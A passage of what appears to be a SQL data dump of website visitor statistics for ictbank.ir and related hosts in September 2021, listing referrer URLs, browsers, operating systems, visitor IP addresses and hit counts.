(13477,'2021-09-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.124.2','000',0,2,0),
(13478,'2021-09-09','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','54.145.19.186','000',0,2,0),
(13479,'2021-09-09','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.231.151.59','000',0,2,0),
(13480,'2021-09-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','13.78.128.127','000',0,2,0),
(13481,'2021-09-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.14.255.165','000',0,1,0),
(13482,'2021-09-09','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.191','000',0,5,0),
(13483,'2021-09-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.88.171.147','000',0,1,0),
(13484,'2021-09-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.180.231.247','000',0,2,0),
(13485,'2021-09-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(13486,'2021-09-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.214.182','000',0,1,0),
(13487,'2021-09-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.148.183','000',0,1,0),
(13488,'2021-09-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.47.202','000',0,1,0),
(13489,'2021-09-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','35.173.217.152','000',0,2,0),
(13490,'2021-09-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.146','000',0,2,0),
(13491,'2021-09-09','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','23.95.224.228','000',0,13,0),
(13492,'2021-09-09','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','158.222.11.172','000',0,2,0),
(13493,'2021-09-10','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,2,0),
(13494,'2021-09-10','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','23.100.232.233','000',0,1,0),
(13495,'2021-09-10','http://ictbank.ir/blog','Unknown','Android','10',NULL,NULL,'','121.5.226.36','000',0,1,0),
(13496,'2021-09-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(13497,'2021-09-10','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','185.185.132.99','000',0,4,0),
(13498,'2021-09-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,1,0),
(13499,'2021-09-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.95.147.14','000',0,2,0),
(13500,'2021-09-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.40.14.218','000',0,2,0),
(13501,'2021-09-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.246.251','000',0,1,0),
(13502,'2021-09-10','http://ictbank.ir/blog','Unknown','Android','10',NULL,NULL,'','121.5.145.96','000',0,2,0),
(13503,'2021-09-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,1,0),
(13504,'2021-09-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.221.8','000',0,1,0),
(13505,'2021-09-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.166.25','000',0,2,0),
(13506,'2021-09-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(13507,'2021-09-10','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.146','000',0,2,0),
(13508,'2021-09-10','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','93.177.103.77','000',0,4,0),
(13509,'2021-09-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','94.158.36.183','000',0,2,0),
(13510,'2021-09-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(13511,'2021-09-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','94.158.36.183','000',0,1,0),
(13512,'2021-09-11','https://duckduckgo.com/','Firefox Mobile','Android','10',NULL,NULL,'','37.188.169.141','000',0,2,0),
(13513,'2021-09-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','137.184.65.143','000',0,2,0),
(13514,'2021-09-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(13515,'2021-09-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','154.49.204.66','000',0,2,0),
(13516,'2021-09-11','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','188.143.235.92','000',0,72,0),
(13517,'2021-09-11','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','193.85.180.163','000',0,2,0),
(13518,'2021-09-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(13519,'2021-09-11','http://ictbank.ir/blog','Internet Explorer','Windows','10.0',NULL,NULL,'','50.31.21.9','000',0,2,0),
(13520,'2021-09-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.20','000',0,2,0),
(13521,'2021-09-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.198.74','000',0,2,0),
(13522,'2021-09-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(13523,'2021-09-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(13524,'2021-09-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.188.181.64','000',0,1,0),
(13525,'2021-09-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','138.128.118.130','000',0,2,0),
(13526,'2021-09-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','80.66.88.100','000',0,2,0),
(13527,'2021-09-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.148.241','000',0,1,0),
(13528,'2021-09-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.221.8','000',0,1,0),
(13529,'2021-09-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.47.202','000',0,1,0),
(13530,'2021-09-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,1,0),
(13531,'2021-09-11','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','144.217.242.202','000',0,1,0),
(13532,'2021-09-11','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.146','000',0,1,0),
(13533,'2021-09-12','http://82.102.9.14/blog','Chrome','Linux','Unknown',NULL,NULL,'','125.64.94.138','000',0,2,0),
(13534,'2021-09-12','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.146','000',0,1,0),
(13535,'2021-09-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(13536,'2021-09-12','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','193.85.180.163','000',0,2,0),
(13537,'2021-09-12','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','46.21.198.186','000',0,4,0),
(13538,'2021-09-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(13539,'2021-09-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(13540,'2021-09-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.32.203.163','000',0,2,0),
(13541,'2021-09-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.95.147.14','000',0,1,0),
(13542,'2021-09-12','http://google.com/','Firefox','Windows','6.1',NULL,NULL,'','185.226.116.225','000',0,2,0),
(13543,'2021-09-12','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.43','000',0,2,0),
(13544,'2021-09-12','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','102.219.29.242','000',0,6,0),
(13545,'2021-09-12','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,1,0),
(13546,'2021-09-12','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.201.240.224','000',0,2,0),
(13547,'2021-09-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.201.26.225','000',0,1,0),
(13548,'2021-09-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.192.62','000',0,1,0),
(13549,'2021-09-12','http://ictbank.ir/blog','Unknown','Linux','Unknown',NULL,NULL,'','67.213.90.30','000',0,1,0),
(13550,'2021-09-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.214.182','000',0,1,0),
(13551,'2021-09-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.222.72','000',0,1,0),
(13552,'2021-09-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,2,0),
(13553,'2021-09-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,1,0),
(13554,'2021-09-12','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,1,0),
(13555,'2021-09-13','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,1,0),
(13556,'2021-09-13','https://www.google.com','Chrome','Windows','10.0',NULL,NULL,'','167.114.211.168','000',0,39,0),
(13557,'2021-09-13','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,16,0),
(13558,'2021-09-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','40.86.214.136','000',0,2,0),
(13559,'2021-09-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','192.53.170.243','000',0,2,0),
(13560,'2021-09-13','http://ictbank.ir/blog','Unknown','Android','10',NULL,NULL,'','121.5.226.36','000',0,2,0),
(13561,'2021-09-13','https://www.google.com/','Chrome','Android','9',NULL,NULL,'','151.239.58.150','000',0,6,0),
(13562,'2021-09-13','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.65.69','000',0,1,0),
(13563,'2021-09-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.181.201','000',0,2,0),
(13564,'2021-09-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.22','000',0,2,0),
(13565,'2021-09-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.53.219','000',0,1,0),
(13566,'2021-09-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','54.80.28.33','000',0,1,0),
(13567,'2021-09-13','http://ictbank.ir/blog','Chrome','OS X','10.15.2',NULL,NULL,'','167.99.48.249','000',0,1,0),
(13568,'2021-09-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,2,0),
(13569,'2021-09-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.214.182','000',0,1,0),
(13570,'2021-09-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.226.188','000',0,1,0),
(13571,'2021-09-13','http://design-arena.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','208.87.129.67','000',0,2,0),
(13572,'2021-09-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','34.222.122.87','000',0,1,0),
(13573,'2021-09-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','54.190.69.25','000',0,1,0),
(13574,'2021-09-13','https://www.google.com/','Internet Explorer','Linux','Unknown',NULL,NULL,'','137.184.11.237','000',0,3,0),
(13575,'2021-09-13','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','192.210.176.198','000',0,13,0),
(13576,'2021-09-13','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','170.83.176.237','000',0,2,0),
(13577,'2021-09-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','50.87.249.216','000',0,1,0),
(13578,'2021-09-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','208.87.129.67','000',0,1,0),
(13579,'2021-09-14','http://ictbank.ir/blog','Chrome','Android','10.0',NULL,NULL,'','61.135.15.140','000',0,1,0),
(13580,'2021-09-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','204.44.124.163','000',0,2,0),
(13581,'2021-09-14','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','100.21.218.158','000',0,3,0),
(13582,'2021-09-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.90.160.122','000',0,2,0),
(13583,'2021-09-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.95.147.14','000',0,1,0),
(13584,'2021-09-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(13585,'2021-09-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.214.88.77','000',0,2,0),
(13586,'2021-09-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.206.18','000',0,1,0),
(13587,'2021-09-14','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.145','000',0,1,0),
(13588,'2021-09-14','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.240','000',0,1,0),
(13589,'2021-09-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.125.217','000',0,1,0),
(13590,'2021-09-14','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.192','000',0,10,0),
(13591,'2021-09-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(13592,'2021-09-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(13593,'2021-09-14','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(13594,'2021-09-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','123.245.25.43','000',0,1,0),
(13595,'2021-09-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,2,0),
(13596,'2021-09-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.47.104','000',0,1,0),
(13597,'2021-09-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.226.188','000',0,1,0),
(13598,'2021-09-14','https://www.google.com','Chrome','Windows','10.0',NULL,NULL,'','192.99.100.141','000',0,39,0),
(13599,'2021-09-14','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','159.242.234.43','000',0,5,0),
(13600,'2021-09-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','38.95.185.5','000',0,2,0),
(13601,'2021-09-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(13602,'2021-09-15','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(13603,'2021-09-15','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.136','000',0,1,0),
(13604,'2021-09-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(13605,'2021-09-15','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','27.115.124.9','000',0,2,0),
(13606,'2021-09-15','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','27.115.124.99','000',0,1,0),
(13607,'2021-09-15','http://ictbank.ir/blog','Chrome','Android','8.1',NULL,NULL,'','101.36.109.176','000',0,3,0),
(13608,'2021-09-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.42.76.130','000',0,2,0),
(13609,'2021-09-15','http://82.102.9.14/blog','Unknown','Android','10',NULL,NULL,'','42.193.8.97','000',0,2,0),
(13610,'2021-09-15','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(13611,'2021-09-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.44.29','000',0,1,0),
(13612,'2021-09-15','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','188.143.235.92','000',0,48,0),
(13613,'2021-09-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.47.104','000',0,1,0),
(13614,'2021-09-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,1,0),
(13615,'2021-09-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(13616,'2021-09-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.148.183','000',0,1,0),
(13617,'2021-09-15','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','144.168.150.120','000',0,21,0),
(13618,'2021-09-15','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','168.81.123.112','000',0,2,0),
(13619,'2021-09-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.206.98','000',0,1,0),
(13620,'2021-09-15','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.122','000',0,2,0),
(13621,'2021-09-15','http://ictbank.ir/blog','Firefox','OS X','Unknown',NULL,NULL,'','93.158.90.119','000',0,2,0),
(13622,'2021-09-16','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','188.143.235.92','000',0,24,0),
(13623,'2021-09-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','162.214.80.67','000',0,1,0),
(13624,'2021-09-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(13625,'2021-09-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.74.96','000',0,1,0),
(13626,'2021-09-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','132.145.9.189','000',0,2,0),
(13627,'2021-09-16','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.14','000',0,2,0),
(13628,'2021-09-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.189.13.185','000',0,2,0),
(13629,'2021-09-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.191.57.180','000',0,2,0),
(13630,'2021-09-16','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','44.198.179.19','000',0,42,0),
(13631,'2021-09-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(13632,'2021-09-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','14.186.228.116','000',0,23,0),
(13633,'2021-09-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(13634,'2021-09-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.158.134','000',0,1,0),
(13635,'2021-09-16','http://ictbank.ir/blog/category/security/','Firefox','Windows','10.0',NULL,NULL,'','193.150.99.216','000',0,1,0),
(13636,'2021-09-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.209.87.86','000',0,1,0),
(13637,'2021-09-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.226.188','000',0,1,0),
(13638,'2021-09-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(13639,'2021-09-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,1,0),
(13640,'2021-09-16','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','58.247.51.194','000',0,6,0),
(13641,'2021-09-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.186.142.186','000',0,2,0),
(13642,'2021-09-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','77.222.117.245','000',0,2,0),
(13643,'2021-09-17','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(13644,'2021-09-17','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','139.162.253.37','000',0,2,0),
(13645,'2021-09-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(13646,'2021-09-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(13647,'2021-09-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(13648,'2021-09-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.206.74','000',0,1,0),
(13649,'2021-09-17','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','177.66.221.255','000',0,1,0),
(13650,'2021-09-17','http://design-arena.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','185.27.99.122','000',0,1,0),
(13651,'2021-09-17','http://design-arena.ir/blog/','Chrome','OS X','10.13.6',NULL,NULL,'','185.27.99.136','000',0,1,0),
(13652,'2021-09-17','http://design-arena.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','164.132.202.72','000',0,5,0),
(13653,'2021-09-17','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','3.82.48.190','000',0,2,0),
(13654,'2021-09-17','http://ictbank.ir/blog/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','Firefox','Windows','10.0',NULL,NULL,'','185.168.250.200','000',0,1,0),
(13655,'2021-09-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.134.79','000',0,2,0),
(13656,'2021-09-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.95.147.14','000',0,2,0),
(13657,'2021-09-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.159.90','000',0,1,0),
(13658,'2021-09-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','23.81.205.204','000',0,2,0),
(13659,'2021-09-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,2,0),
(13660,'2021-09-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.221.8','000',0,1,0),
(13661,'2021-09-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.47.202','000',0,1,0),
(13662,'2021-09-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,16,0),
(13663,'2021-09-18','http://design-arena.ir/blog','Unknown','Android','10',NULL,NULL,'','121.5.147.119','000',0,5,0),
(13664,'2021-09-18','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','94.155.33.88','000',0,5,0),
(13665,'2021-09-18','http://design-arena.ir/blog','Chrome','Android','10.0',NULL,NULL,'','61.135.15.199','000',0,2,0),
(13666,'2021-09-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.163','000',0,2,0),
(13667,'2021-09-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(13668,'2021-09-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.212.49','000',0,1,0),
(13669,'2021-09-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','50.87.144.46','000',0,1,0),
(13670,'2021-09-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','64.227.107.188','000',0,2,0),
(13671,'2021-09-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.198.25.156','000',0,2,0),
(13672,'2021-09-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','192.53.170.243','000',0,2,0),
(13673,'2021-09-18','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.175','000',0,1,0),
(13674,'2021-09-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(13675,'2021-09-18','http://ictbank.ir/blog','Chrome','Android','4.3',NULL,NULL,'','34.229.125.240','000',0,1,0),
(13676,'2021-09-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.214.135.20','000',0,2,0),
(13677,'2021-09-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.108.52.84','000',0,2,0),
(13678,'2021-09-18','http://www.ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.108','000',0,1,0),
(13679,'2021-09-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.186.142.31','000',0,2,0),
(13680,'2021-09-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.186.142.186','000',0,2,0),
(13681,'2021-09-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.85.215.244','000',0,1,0),
(13682,'2021-09-18','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','178.159.98.117','000',0,2,0),
(13683,'2021-09-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.95.147.14','000',0,2,0),
(13684,'2021-09-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.222.72','000',0,1,0),
(13685,'2021-09-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.148.49','000',0,1,0),
(13686,'2021-09-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,1,0),
(13687,'2021-09-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,1,0),
(13688,'2021-09-18','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.9','000',0,2,0),
(13689,'2021-09-18','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','160.116.71.218','000',0,2,0),
(13690,'2021-09-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','46.8.19.54','000',0,2,0),
(13691,'2021-09-19','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','23.100.232.233','000',0,1,0),
(13692,'2021-09-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(13693,'2021-09-19','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.136','000',0,2,0),
(13694,'2021-09-19','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.108','000',0,3,0),
(13695,'2021-09-19','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.71.30.89','000',0,1,0),
(13696,'2021-09-19','http://ictbank.ir/blog','Unknown','Windows','5.1',NULL,NULL,'','138.201.60.47','000',0,1,0),
(13697,'2021-09-19','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','185.191.34.215','000',0,2,0),
(13698,'2021-09-19','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','162.212.175.26','000',0,13,0),
(13699,'2021-09-19','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','194.36.97.158','000',0,2,0),
(13700,'2021-09-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(13701,'2021-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.12.104.168','000',0,2,0),
(13702,'2021-09-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.95.147.14','000',0,1,0),
(13703,'2021-09-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
